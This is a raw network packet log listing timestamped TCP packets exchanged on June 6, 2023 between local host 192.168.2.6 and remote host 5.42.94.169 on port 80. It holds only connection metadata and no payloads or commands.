Jun 6, 2023 17:14:52.226062059 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226068974 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226080894 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226095915 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226104975 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226128101 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226144075 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226149082 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226172924 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226186991 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226198912 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226219893 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226233959 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226244926 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226270914 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226279974 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226291895 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226317883 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226326942 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226342916 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226366043 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226376057 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226387024 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226409912 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226423025 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226433039 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226455927 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226474047 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226499081 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226505995 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226519108 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226540089 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226562977 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226577997 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226588964 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226613998 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226624012 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226639032 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226659060 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226675034 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226681948 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226706982 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226732016 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226746082 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226757050 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226782084 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226798058 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226808071 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226830006 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226851940 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226861000 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226876020 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226900101 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226926088 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226934910 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226948977 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226970911 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226988077 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.226994038 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227014065 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227025986 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227035999 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227045059 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227060080 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227066994 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227083921 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227108955 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227123976 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227133989 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227157116 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227174044 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227180958 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227200985 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227216005 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227219105 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227238894 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227250099 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227263927 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227287054 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227299929 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227313042 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227338076 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227346897 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227358103 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227380991 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227394104 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227399111 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227416992 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227433920 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227442980 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227452993 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227471113 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227474928 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227489948 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227508068 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227508068 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227525949 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227544069 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227557898 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227561951 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227581024 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227583885 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227598906 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227613926 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227617979 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227637053 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227647066 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227654934 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227673054 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227690935 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227694035 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227709055 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227725983 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227727890 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227744102 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227761030 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227761984 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227780104 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227793932 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227797031 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227814913 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227829933 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227833986 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227852106 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227869987 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227869987 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227888107 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227901936 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.227906942 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227925062 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.227937937 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.276873112 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.276873112 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.276912928 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.276937008 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.276962042 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.276984930 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277003050 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277009964 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277029991 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277049065 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277072906 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277081013 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277096033 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277115107 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277120113 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277138948 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277143002 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277168036 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277190924 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277208090 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277209997 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277230024 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277235031 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277257919 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277282953 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277287960 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277307034 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277323008 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277329922 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277354002 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277374029 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277376890 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277400970 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277432919 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277439117 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277460098 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277477980 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277477980 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277496099 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277515888 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277524948 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277534008 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277553082 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277555943 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277571917 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277590990 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277590990 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277610064 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277627945 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277633905 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277647972 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277666092 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277666092 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277684927 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277704000 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277704000 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277721882 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277740955 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277745962 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277760029 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277789116 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277790070 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277808905 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277829885 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277847052 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277848005 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277867079 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277869940 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277884960 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277904034 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277904987 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277921915 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277949095 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277951956 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.277966976 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277986050 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.277986050 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278003931 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278023005 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278023005 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278043032 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278060913 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278069973 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278080940 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278104067 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278103113 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278126955 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278145075 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278151035 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278173923 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278191090 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278198004 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278215885 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278234959 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278239965 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278254032 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278271914 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278275013 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278290987 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278310061 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278314114 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278328896 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278347969 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278352976 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278367043 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278384924 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278387070 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278404951 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278424025 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278424978 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278443098 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278461933 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278460979 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278480053 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278496027 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278497934 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278517962 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278532982 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278542042 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278563976 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278584003 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278584957 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278609991 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278628111 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278634071 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278659105 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278672934 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278677940 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278696060 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278713942 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278713942 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278733015 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278752089 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278753042 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278773069 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278789997 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278803110 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278829098 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278845072 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278852940 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278877974 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278887987 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278898954 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278918028 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278935909 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278935909 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278954983 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278971910 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.278974056 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.278991938 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.279011965 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.279021978 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.279062986 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.327802896 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327851057 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327871084 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327889919 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327909946 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327928066 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327946901 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327964067 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.327982903 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328001022 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328020096 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328038931 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328041077 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328058958 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328087091 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328104973 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328111887 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328124046 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328142881 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328150988 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328175068 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328378916 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328402996 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328422070 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328439951 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328439951 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328485966 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328638077 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328676939 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328696012 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328715086 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328716993 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328733921 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328753948 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328764915 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328773022 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328797102 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328809023 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328819990 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328824997 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328845024 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328860998 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328866005 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328886032 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328905106 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328916073 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328923941 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328943014 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328953028 CEST	49708	80	192.168.2.6	5.42.94.169
